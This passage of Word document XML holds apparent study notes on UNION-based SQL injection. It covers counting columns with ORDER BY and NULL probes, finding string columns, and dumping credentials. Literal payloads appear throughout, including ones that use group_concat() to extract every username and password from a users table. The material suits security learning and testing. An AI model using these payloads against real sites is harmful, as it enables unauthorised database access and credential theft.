        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first limit result to zero rows – no input or input that does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB5ED2" w14:textId="0F18B64B" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then use UNION clause to control what first query returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42161863" w14:textId="797E1A3B" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data will be used in second query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C132DB" w14:textId="50233E07" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ‘ union select ‘STRING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F6C88" w14:textId="005CB2DE" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>see query and comment out wildcard (%) by appending - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4699CE" w14:textId="7655D606" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ‘ union select ‘1’- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56009F10" w14:textId="35F7A60D" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>without limiting result to zero rows first, output would have been from LIKE clause, not the output from the UNION statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA13E4" w14:textId="54371E07" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>UNION-based SQL injection to extract data from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187DCB7" w14:textId="19DC8290" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A07BA">
        <w:t>' union select '1'</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="009A07BA">
        <w:t xml:space="preserve"> union select 1,2,3,4-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B899113" w14:textId="6FDFE2D9" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>double quote necessary to prevent closing of the string for second union clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E8B7A" w14:textId="02587CBD" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to get all usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B61BF4" w14:textId="1F0CF5E2" w:rsidR="009A07BA" w:rsidRDefault="009A07BA" w:rsidP="009A07BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A07BA">
        <w:t>' union select'-1'' union select 1,2,group_concat(password),group_concat(username) from users</w:t>
      </w:r>
      <w:r w:rsidR="00FD234F">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480DF3F" w14:textId="4A974202" w:rsidR="00FD234F" w:rsidRPr="00FD234F" w:rsidRDefault="00FD234F" w:rsidP="00FD234F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD234F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>group_concat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768266E0" w14:textId="7E1F85D8" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Union-based SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5EB345" w14:textId="61C9F09E" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>always look for areas on page where output is presented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110BE73" w14:textId="0FA9504B" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79F448" w14:textId="5F7F7F3F" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>leverages UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394185DA" w14:textId="46DC058B" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD80EA" w14:textId="69B9F80D" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows execution of one or more additional SELECT queries and append the results to the original query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DFEA4" w14:textId="3BFB317F" w:rsidR="006712A9" w:rsidRDefault="006712A9" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>number of columns in the injected query must be the same as in the original query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6A024" w14:textId="3653E0E2" w:rsidR="006712A9" w:rsidRDefault="006712A9" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data types for each column must match the corresponding type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE71CF6" w14:textId="56E1E229" w:rsidR="006712A9" w:rsidRDefault="006712A9" w:rsidP="006712A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ‘UNION SELECT 1,2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CDDC92" w14:textId="72F034DB" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0428B5FD" w14:textId="342D71B4" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns a single result of first and second positions from usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FD391" w14:textId="52797F1C" w:rsidR="000D11B3" w:rsidRDefault="000D11B3" w:rsidP="000D11B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000D11B3">
        <w:t>' UNION SELECT 1, password from users</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31B470" w14:textId="3DD54486" w:rsidR="000D11B3" w:rsidRDefault="000D11B3" w:rsidP="000D11B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns only one password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2A837" w14:textId="1D6E7053" w:rsidR="000D11B3" w:rsidRDefault="000D11B3" w:rsidP="000D11B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000D11B3">
        <w:t>' UNION SELECT 1,group_concat(password) FROM users-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7F306" w14:textId="0FB2519F" w:rsidR="000D11B3" w:rsidRDefault="000D11B3" w:rsidP="000D11B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>group_concat() function assists in dumping all the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34519384" w14:textId="07C57464" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Union SQLi Attacks consist of Three Stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0EC784" w14:textId="23CFE20E" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determine number of columns that can be retrieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FF29F" w14:textId="29794DD3" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Make sure discovered columns are in a suitable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB68F3" w14:textId="010B5D96" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11FFA9" w14:textId="0B31CDFC" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To Determine the number of columns required </w:t>
      </w:r>
      <w:r w:rsidR="00464787">
        <w:t>for an SQL injection UNION attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7EC94" w14:textId="7EC856C2" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inject a series of ORDER BY queries until an error occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B53B66" w14:textId="3E2CF5DB" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ‘ ORDER BY 1- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0B7A3" w14:textId="2D8CD900" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then ‘ ORDER BY 2- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DAC25" w14:textId="0F47FB65" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then ‘ ORDER BY 3- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57840012" w14:textId="54150FF4" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>etc. until an error occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711F7C8" w14:textId="7038384B" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Submit a series of UNION SELECT payloads with a number of NULL values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D47A1A" w14:textId="6D999DF6" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ UNION SELECT NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394DD809" w14:textId="7BCA066E" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ UNION SELECT NULL,NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10659A48" w14:textId="6EB4002E" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ UNION SELECT NULL,NULL,NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77E0F2" w14:textId="2CD27523" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>etc. until error occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4998E" w14:textId="254042F4" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>single NULL value causes error, meaning more columns present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34428363" w14:textId="0DB1EB55" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>number of NULL equals number of columns pre-error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DDFB0" w14:textId="6731C757" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To find columns with a useful data type in an SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB94C56" w14:textId="0BAD5996" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typically will be in string form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145279AE" w14:textId="53447336" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>probe each column to test whether it can hold string data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404B0D1" w14:textId="456A822F" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace one of the UNION SELECT payloads with a string value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22112895" w14:textId="25C8289C" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>‘ UNION SELECT ‘a’,NULL,NULL,NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA9D20" w14:textId="75EDA446" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ UNION SELECT NULL,‘a’,NULL,NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C404BF" w14:textId="7B2C7547" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
